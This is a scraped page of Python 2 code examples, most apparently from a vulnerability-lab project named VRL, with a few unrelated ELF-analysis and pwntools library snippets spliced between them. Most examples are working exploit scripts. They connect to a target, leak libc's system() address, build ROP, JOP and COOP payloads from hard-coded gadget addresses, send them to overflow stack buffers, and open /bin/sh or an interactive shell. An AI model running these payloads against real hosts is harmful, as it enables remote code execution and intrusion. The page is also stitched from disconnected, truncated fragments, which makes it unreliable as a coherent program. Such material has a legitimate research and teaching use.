                                 'data3': 0x00000000,
                                 'offset': 22,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic32'

                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))

                libc = ELF('../../vulnerabilities/stack_overflow/code_reuse32_static')

                # get  sysaddress here
                self.property['sysaddress'] = libc.symbols['system']
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh address
                binsh_addr = next(libc.search('/bin/sh'))

                # get ret address
                pop_ret1_addr = self.property['ret1']
                pop_ret2_addr = self.property['ret2']
                pop_ret3_addr = self.property['ret3']
                pop_ret4_addr = self.property['ret4']
                pop_ret5_addr = self.property['ret5']
                pop_ret6_addr = self.property['ret6']

                # set payload
                payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
                    pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
                    self.property['data2']) + p32(pop_ret5_addr) + p32(self.property['data3']) + p32(pop_ret6_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()

        else:
            print 'Unrecognized architecture, stop.'
            return
Example #27
0
    def lookup (self, symb = None, lib = None):
        """lookup(symb = None, lib = None) -> int

        Find the address of ``symbol``, which is found in ``lib``.

        Arguments:
            symb(str): Named routine to look up
            lib(str): Substring to match for the library name.
              If omitted, the current library is searched.
              If set to ``'libc'``, ``'libc.so'`` is assumed.

        Returns:
            Address of the named symbol, or :const:`None`.
        """
        result = None

        if lib == 'libc':
            lib = 'libc.so'

        #
        # Get a pretty name for the symbol to show the user
        #
        if symb and lib:
            pretty = '%r in %r' % (symb, lib)
        else:
            pretty = repr(symb or lib)

        if not pretty:
            self.failure("Must specify a library or symbol")

        self.waitfor('Resolving %s' % pretty)

        #
        # If we are loading from a different library, create
        # a DynELF instance for it.
        #
        if lib is not None: dynlib = self._dynamic_load_dynelf(lib)
        else:   dynlib = self

        if dynlib is None:
            log.failure("Could not find %r" % lib)
            return None

        #
        # If we are resolving a symbol in the library, find it.
        #
        if symb and self.libcdb:
            # Try a quick lookup by build ID
            self.status("Trying lookup based on Build ID")
            build_id = dynlib._lookup_build_id(lib=lib)
            result   = None
            if build_id:
                log.info("Trying lookup based on Build ID: %s" % build_id)
                path = libcdb.search_by_build_id(build_id)
                if path:
                    with context.local(log_level='error'):
                        e = ELF(path)
                        e.address = dynlib.libbase
                        result = e.symbols[symb]

            if not result:
                self.status("Trying remote lookup")
                result = dynlib._lookup(symb)
        else:
            result = dynlib.libbase

        #
        # Did we win?
        #
        if result: self.success("%#x" % result)
        else:      self.failure("Could not find %s" % pretty)

        return result
Example #28
0
	def __init__(self, filename, func='main'):
		elf = ELF(filename)
		addr = elf.sym[func]
		self.cfg = CFG(elf, addr)
		self.paths = [SymState(self.cfg, elf)]
Example #29
0
    def run(self):
     if self.options['architecture'] == 'amd64':
      if self.options['static'] == 'False':
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
       # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        #s.connect((self.options['dIP'], int(self.options['port'])))
        p = remote(self.options['dIP'], int(self.options['port']))
        #p = process('../../vulnerabilities/coop/coop')
        a = raw_input('input: ')


        #set /bin/sh ASCII
        binsh = p32(0x6e69622f) + p32(0x0068732f) + p32(0x74697865) + p32(0x63003020) + p32(0x6e6f6e61) + p32(0x6c616369)
        
        #set payload
        temppayload = "b"*2
        #s.send(temppayload)
        p.sendline(temppayload)

        
        payload = binsh + p64(self.property['courseMLoopVptr']) + p64(self.property['studentsptr']) + p64(self.property['nstudent']) + p64(self.property['studentptr0']) + p64(self.property['studentptr1']) + p64(self.property['studentptr3']) + p64(self.property['studentptr2']) + p64(self.property['coursePrintfSystemVptr']) + p64(self.property['studentReadString']) + p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(self.property['sysaddress'])
        #s.send(payload)
        p.sendline(payload)

        #get new sysaddress here
        #recv_data = s.recv(16)
        recv_data = p.recvline()
        self.property['sysaddress'] = int(recv_data,16)
        print "sysaddress = " + hex(self.property['sysaddress'])

        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

        #get /bin/sh offset
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)

        
        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset
        
        print "binsh_addr = " + hex(binsh_addr)
        
        #set payload
        payload = p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(binsh_addr) + p64(self.property['sysaddress'])
        #s.send(payload)
        p.sendline(payload)
        print 'interactive'
        #s.close()
        p.interactive()

      else:
        print 'static'
     elif self.options['architecture'] == 'i386':

      if self.options['static'] == 'False':
        print 'dl'
       
      else:
        print 'static'
       
     else:
        print 'Unrecognized architecture, stop.'
        return
Example #30
0
 def from_blob(blob, *a, **kw):
     return ROP(ELF.from_bytes(blob, *a, **kw))
Example #31
0
            dst, src = op.operands
            op_1 = state.read_value(dst)
            op_2 = state.read_value(src)
            if isinstance(op_1, Immediate) and isinstance(op_2, Immediate):
                val = Immediate(op_1.value & op_2.value)
            else:
                val = Unknown()
            new_state.store_value(dst, val)

        return new_state


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print('Usage: {} <file>'.format(sys.argv[0]))
        sys.exit()

    e = ELF(sys.argv[1])
    main_addr = e.symbols['main']

    cfg = CFG(e, main_addr)
    start = MachineState()
    start.regs[X86_REG_RSP] = StackPointer(0)

    vars = ConstantAnalysis(cfg, entry_state=start)
    for op_addr in sorted(cfg.ops):
        op = cfg.ops[op_addr]
        print('{:120s} -- {}'.format(vars.before_states[op], op_str(op)))
Example #32
0
File: run.py Project: Readm/VRL
    def run(self):
      if self.options['static'] == 'False':

        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))
        
        #get new sysaddress here
        s.send("a")        #any string
        recv_data = s.recv(16)
        self.property['sysaddress'] = int(recv_data,16)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

        #get /bin/sh offset
        print "sysaddress = " + hex(self.property['sysaddress'])
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)

        #get ret offset
        pop_ret_offset = self.property['ret'] - libc.symbols['system']
        print "pop_ret_offset = " + hex(pop_ret_offset)

        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset

        #get ret address
        pop_ret_addr = self.property['sysaddress'] + pop_ret_offset

        payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
        print "\n##########sending payload##########\n"
        s.send(payload)
        s.close()
        #p.interactive()
      else:
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        self.property = {'ret':0x0000000000401696, #gadget address in exe
                         'offset':24, #offset
                         'sysaddress':0x0} # system function address, initialize 0
      
        self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

     
        
        libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

        self.property['sysaddress'] = libc.symbols['system']
        print "sysaddress = " + hex(self.property['sysaddress'])
     


        #get /bin/sh address
        binsh_addr = next(libc.search('/bin/sh'))

        #get ret address
        pop_ret_addr = self.property['ret']

        payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
        print "\n##########sending payload##########\n"
        s.send(payload)
        s.close()
        if page_prefix == bytes('\x7fELF', 'utf8'):
            logging.info(
                "epp base address: 0x{:X}".format(epp_ba))
            break

        epp_ba -= 0x1000

    def leak(address):
        return a_read(s, address, 8)

    epp_dyn_elf = DynELF(leak, epp_ba)
    libc_mprotect = epp_dyn_elf.lookup('mprotect', 'libc')

    context.clear(arch='amd64')
    binary = ELF(epp_path)
    binary.address = epp_ba
    binary.symbols = {'mprotect': libc_mprotect}
    rop = ROP(binary)
    # Mark the current stack page, and the one just before, incase we are on a boundary.
    rop.call(
        'mprotect', (stack_frame.previous_frame_stack_base_pointer & ~0xFFF, 0x2000, 0x7))

    target_ip = socket.gethostbyname(socket.gethostname())

    mprotect_rop = rop.chain()

    logging.info(rop.dump())
    # We are gonna be a little lazy and just end with an infinite loop,
    # we make no attempt to clean up the stack and continue normal
    # execution.
Example #34
0
    def run(self):
        if self.options['static'] == 'False':
            '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            #get new sysaddress here
            s.send("a")  #any string
            recv_data = s.recv(16)
            self.property['sysaddress'] = int(recv_data, 16)
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

            #get /bin/sh offset
            print "sysaddress = " + hex(self.property['sysaddress'])
            binsh_addr_offset = next(
                libc.search('/bin/sh')) - libc.symbols['system']
            print "binsh_addr_offset = " + hex(binsh_addr_offset)

            #get ret offset
            pop_ret_offset = self.property['ret'] - libc.symbols['system']
            print "pop_ret_offset = " + hex(pop_ret_offset)

            #get /bin/sh address
            binsh_addr = self.property['sysaddress'] + binsh_addr_offset

            #get ret address
            pop_ret_addr = self.property['sysaddress'] + pop_ret_offset

            payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
                binsh_addr) + p64(self.property['sysaddress'])
            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()
            #p.interactive()
        else:
            '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
            self.property = {
                'ret': 0x0000000000401696,  #gadget address in exe
                'offset': 24,  #offset
                'sysaddress': 0x0
            }  # system function address, initialize 0

            self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

            self.property['sysaddress'] = libc.symbols['system']
            print "sysaddress = " + hex(self.property['sysaddress'])

            #get /bin/sh address
            binsh_addr = next(libc.search('/bin/sh'))

            #get ret address
            pop_ret_addr = self.property['ret']

            payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
                binsh_addr) + p64(self.property['sysaddress'])
            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()
Example #35
0
    def run(self):
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        if self.options['architecture'] == 'amd64':
            if self.options['static'] == 'False':
                self.property = {'ret1': 0x0000000000021102,  # gadget address in libc
                                 'ret2': 0x000000000008ae95,
                                 'ret3': 0x000000000003a718,
                                 'ret4': 0x0000000000114809,
                                 'ret5': 0x00000000000bb945,
                                 'data1': 0x000000000000003b,  # execv systemcall number
                                 'data2': 0x0000000000000000,
                                 'data3': 0x0000000000000000,
                                 'offset': 40,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))

                # get new sysaddress here
                s.send("a")  # any string
                recv_data = s.recv(16)
                self.property['sysaddress'] = int(recv_data, 16)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh offset
                binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
                print "binsh_addr_offset = " + hex(binsh_addr_offset)

                # get ret offset
                pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
                pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
                pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
                pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
                pop_ret5_offset = self.property['ret5'] - libc.symbols['system']

                # get /bin/sh address
                binsh_addr = self.property['sysaddress'] + binsh_addr_offset

                # get ret address
                pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
                pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
                pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
                pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
                pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
                # pop_ret5_addr =pop_ret4_addr - 2

                # set payload
                payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
                    pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
                    self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
            else:
                self.property = {'ret1': 0x0000000000401696,  # gadget address in libc
                                 'ret2': 0x00000000004264af,
                                 'ret3': 0x00000000004c26e8,
                                 'ret4': 0x0000000000442fe9,
                                 'ret5': 0x0000000000467685,
                                 'data1': 0x000000000000003b,  # execv systemcall number
                                 'data2': 0x0000000000000000,
                                 'data3': 0x0000000000000000,
                                 'offset': 24,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'

                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))

                libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

                # get  sysaddress here
                self.property['sysaddress'] = libc.symbols['system']
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh address
                binsh_addr = next(libc.search('/bin/sh'))

                # get ret address
                pop_ret1_addr = self.property['ret1']
                pop_ret2_addr = self.property['ret2']
                pop_ret3_addr = self.property['ret3']
                pop_ret4_addr = self.property['ret4']
                pop_ret5_addr = self.property['ret5']

                # set payload
                payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
                    pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
                    self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
        elif self.options['architecture'] == 'i386':
            if self.options['static'] == 'False':
                self.property = {'ret1': 0x00018395,  # gadget address in libc  : pop ebx ; ret
                                 'ret2': 0x0002c5dc,  # : xor eax, eax ; ret
                                 'ret3': 0x00023f97,  # : pop eax ; ret
                                 'ret4': 0x0002baab,  # : pop ecx ; pop edx ; ret
                                 'ret5': 0x00002c87,  # : int 0x80
                                 'data1': 0x0000000b,  # execv systemcall number
                                 'data2': 0x00000000,
                                 'data3': 0x00000000,
                                 'offset': 26,  # offset
                                 'sysaddress': 0x0}  # system function address, initialize 0

                '''Run your exploit here, if this script could success, the VRL can run it.
                When the exploit run, follow the options.'''
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.options['dIP'], int(self.options['port'])))

                # get new sysaddress here
                s.send("a")  # any string
                recv_data = s.recv(8)
                self.property['sysaddress'] = int(recv_data, 16)
                libc = ELF('/lib32/libc.so.6')
                print "sysaddress = " + hex(self.property['sysaddress'])

                # get /bin/sh offset
                binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
                print "binsh_addr_offset = " + hex(binsh_addr_offset)

                # get ret offset
                pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
                pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
                pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
                pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
                pop_ret5_offset = self.property['ret5'] - libc.symbols['system']

                # get /bin/sh address
                binsh_addr = self.property['sysaddress'] + binsh_addr_offset

                # get ret address
                pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
                pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
                pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
                pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
                pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
                # pop_ret5_addr =pop_ret4_addr - 2

                # set payload
                payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
                    pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
                    self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)

                print "\n##########sending payload##########\n"
                s.send(payload)
                s.close()
            else:
                print "Not supported: i386 & static."

        else:
            print 'Unrecognized architecture, stop.'
            return
Example #36
0
File: run.py Project: Readm/VRL
    def run(self):
     if self.options['architecture'] == 'amd64':
      if self.options['static'] == 'False':
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
      
        p = remote(self.options['dIP'], int(self.options['port']))
      
        #a = raw_input('input: ')


        #set /bin/sh ASCII
        binsh = p32(0x6e69622f) + p32(0x0068732f)
        
        #set payload
        payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
        #send payload
        p.sendline(payload)
        #recv
        recv_data = p.recv()
        print 'rev1: ' + recv_data


        #set payload
        payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose'])
        #send payload
        p.sendline(payload)
        #recv  get new sysaddress here
        recv_data = p.recvline()
        print 'rev2: ' + recv_data
        self.property['sysaddress'] = int(recv_data,16)
        print "sysaddress = " + hex(self.property['sysaddress'])

        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        #get /bin/sh offset
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)
        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset
        print "binsh_addr = " + hex(binsh_addr)

        
        #set payload
        self.property['choose'] = 2
        self.property['p'] = 0x601098
        self.property['q'] = 0x7fffffffdc78
        payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
        #send payload
        p.sendline(payload)
        #recv
        recv_data = p.recvline()
        print 'rev3: ' + recv_data


        #set payload
        self.property['choose'] = 2
        self.property['p'] = 0x60109c
        self.property['q'] = 0x7fffffffdc7c
        payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
        #send payload
        p.sendline(payload)
        #recv
        recv_data = p.recvline()
        print 'rev4: ' + recv_data


        #set payload
        self.property['limit'] = 0
        self.property['choose'] = 3
        self.property['p'] = 0x601070
        self.property['q'] = 0x601078
        payload = binsh + 'a'*(self.property['offset']-8) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
        #send payload
        p.sendline(payload)


        

        print 'interactive'
        p.interactive()

        

      else:
        print 'static'
     elif self.options['architecture'] == 'i386':

      if self.options['static'] == 'False':
        print 'dl'
       
      else:
        print 'static'
       
     else:
        print 'Unrecognized architecture, stop.'
        return
Example #37
0
File: run.py Project: Readm/VRL
    def run(self):
      if self.options['static'] == 'False':
        '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

        #get new sysaddress here
        s.send('a')      
        recv_data = s.recv(16)
        self.property['sysaddress'] = int(recv_data,16)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        print "sysaddress = " + hex(self.property['sysaddress'])
        
        #get rbp
        s.send('b')        
        recv_data1 = s.recv(16) 
        self.property['gadgetaddr'] = int(recv_data1,16)
        print "gadgetaddr = " + hex(self.property['gadgetaddr'])
        gadgetaddr=self.property['gadgetaddr'] + 72

        #get /bin/sh offset
        binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
        print "binsh_addr_offset = " + hex(binsh_addr_offset)

        #get jmp offset
        pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
        pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
        pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
        pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
        pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
        pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
        print "pop_jmp1_offset = " + hex(pop_jmp1_offset)

        #get /bin/sh address
        binsh_addr = self.property['sysaddress'] + binsh_addr_offset

        #get jmp address
        pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
        pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
        pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
        pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
        pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
        pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
        pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
        print "pop_jmp1_addr = " + hex(pop_jmp1_addr)

        #set payload
        payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(binsh_addr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp52_addr) + p64(pop_jmp6_addr)


        print "\n##########sending payload##########\n"
        s.send(payload)
        s.close()
      else:
        self.property = {'ret':0x00000000004009d9, #initialize register address
                         'dispatcherAddr':0x00000000004009dc,# dispatcher gadget address
                         'gadgetaddr':0x0,#the address of first gadget address in stack, initialize 0
                         'data1':0x0000000000000000,
                         'data2':0x000000000000003b,#execv systemcall number
                         'jmp1':0x00000000004738cd,#functional gadget address in libc
                         'jmp2':0x000000000047e7a0,
                         'jmp3':0x0000000000441cb2,
                         'jmp4':0x0000000000441cb2,
                         'jmp5':0x00000000004009e2,
                         'jmp6':0x0000000000467685, 
                         'offset':24, # offset 
                         'sysaddress':0x0} # system function address, initialize 0
        self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.options['dIP'], int(self.options['port'])))

        libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

        #get  sysaddress here
        self.property['sysaddress'] = libc.symbols['system']
        print "sysaddress = " + hex(self.property['sysaddress'])
        
        #get rbp
        s.send('b')        
        recv_data1 = s.recv(16) 
        self.property['gadgetaddr'] = int(recv_data1,16)
        print "gadgetaddr = " + hex(self.property['gadgetaddr'])
        gadgetaddr=self.property['gadgetaddr'] + 64

        #get /bin/sh address
        binsh_addr = next(libc.search('/bin/sh'))

        #get jmp offset
        pop_jmp1_addr = self.property['jmp1']
        pop_jmp2_addr = self.property['jmp2']
        pop_jmp3_addr = self.property['jmp3']
        pop_jmp4_addr = self.property['jmp4']
        pop_jmp5_addr = self.property['jmp5']
        pop_jmp6_addr = self.property['jmp6']




        #set payload
        payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(binsh_addr) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp6_addr)


        print "\n##########sending payload##########\n"
        s.send(payload)
        s.close()
Example #38
0
            result = True
            break
        if "Closed" in data:
            sys.stdout.write("Terminated\n")
            sys.stdout.flush()
            break
    sock.close()
    return result


if __name__ == "__main__":
    Host = os.getenv("HOST", "localhost")
    Port = int(os.getenv("PORT", 31340))
    Ticket = os.getenv("TICKET", "")
    File = os.getenv("DIR", "/data") + os.sep + "test.elf"
    f = ELF(File)
    cookie = f.read(f.symbols['COOKIE'], 4)

    crc8 = crcmod.mkCrcFun(0x107, rev=False, initCrc=0x0, xorOut=0x00)

    solve(cookie)
    '''
    Success = 0
    Trials = 5000
    for ii in range(0,Trials):
        if solve():
            Success += 1
        if ii % 25 == 24:
            print("%d/%d" % (Success, ii+1))
    print("%d/%d" % (Success, Trials))
    '''
Example #39
0
    def run(self):
        if self.options['static'] == 'False':
            '''Run your exploit here, if this script could success, the VRL can run it.
        When the exploit run, follow the options.'''
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            #get new sysaddress here
            s.send('a')
            recv_data = s.recv(16)
            self.property['sysaddress'] = int(recv_data, 16)
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
            print "sysaddress = " + hex(self.property['sysaddress'])

            #get rbp
            s.send('b')
            recv_data1 = s.recv(16)
            self.property['gadgetaddr'] = int(recv_data1, 16)
            print "gadgetaddr = " + hex(self.property['gadgetaddr'])
            gadgetaddr = self.property['gadgetaddr'] + 72

            #get /bin/sh offset
            binsh_addr_offset = next(
                libc.search('/bin/sh')) - libc.symbols['system']
            print "binsh_addr_offset = " + hex(binsh_addr_offset)

            #get jmp offset
            pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
            pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
            pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
            pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
            pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
            pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
            print "pop_jmp1_offset = " + hex(pop_jmp1_offset)

            #get /bin/sh address
            binsh_addr = self.property['sysaddress'] + binsh_addr_offset

            #get jmp address
            pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
            pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
            pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
            pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
            pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
            pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
            pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
            print "pop_jmp1_addr = " + hex(pop_jmp1_addr)

            #set payload
            payload = "a" * self.property['offset'] + p64(
                self.property['ret']
            ) + p64(self.property['dispatcherAddr']) + p64(
                self.property['dispatcherAddr']
            ) + p64(gadgetaddr) + p64(binsh_addr) + p64(
                self.property['data1']) + p64(self.property['data1']) + p64(
                    self.property['data1']) + p64(
                        self.property['data2']) + p64(pop_jmp1_addr) + p64(
                            pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
                                pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
                                    pop_jmp52_addr) + p64(pop_jmp6_addr)

            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()
        else:
            self.property = {
                'ret': 0x00000000004009d9,  #initialize register address
                'dispatcherAddr':
                0x00000000004009dc,  # dispatcher gadget address
                'gadgetaddr':
                0x0,  #the address of first gadget address in stack, initialize 0
                'data1': 0x0000000000000000,
                'data2': 0x000000000000003b,  #execv systemcall number
                'jmp1': 0x00000000004738cd,  #functional gadget address in libc
                'jmp2': 0x000000000047e7a0,
                'jmp3': 0x0000000000441cb2,
                'jmp4': 0x0000000000441cb2,
                'jmp5': 0x00000000004009e2,
                'jmp6': 0x0000000000467685,
                'offset': 24,  # offset 
                'sysaddress': 0x0
            }  # system function address, initialize 0
            self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.options['dIP'], int(self.options['port'])))

            libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')

            #get  sysaddress here
            self.property['sysaddress'] = libc.symbols['system']
            print "sysaddress = " + hex(self.property['sysaddress'])

            #get rbp
            s.send('b')
            recv_data1 = s.recv(16)
            self.property['gadgetaddr'] = int(recv_data1, 16)
            print "gadgetaddr = " + hex(self.property['gadgetaddr'])
            gadgetaddr = self.property['gadgetaddr'] + 64

            #get /bin/sh address
            binsh_addr = next(libc.search('/bin/sh'))

            #get jmp offset
            pop_jmp1_addr = self.property['jmp1']
            pop_jmp2_addr = self.property['jmp2']
            pop_jmp3_addr = self.property['jmp3']
            pop_jmp4_addr = self.property['jmp4']
            pop_jmp5_addr = self.property['jmp5']
            pop_jmp6_addr = self.property['jmp6']

            #set payload
            payload = "a" * self.property['offset'] + p64(
                self.property['ret']
            ) + p64(self.property['dispatcherAddr']) + p64(
                self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(
                    self.property['data1']) + p64(
                        self.property['data1']) + p64(binsh_addr) + p64(
                            self.property['data2']) + p64(pop_jmp1_addr) + p64(
                                pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
                                    pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
                                        pop_jmp6_addr)

            print "\n##########sending payload##########\n"
            s.send(payload)
            s.close()
Example #40
0
    def lookup(self, symb=None, lib=None):
        """lookup(symb = None, lib = None) -> int

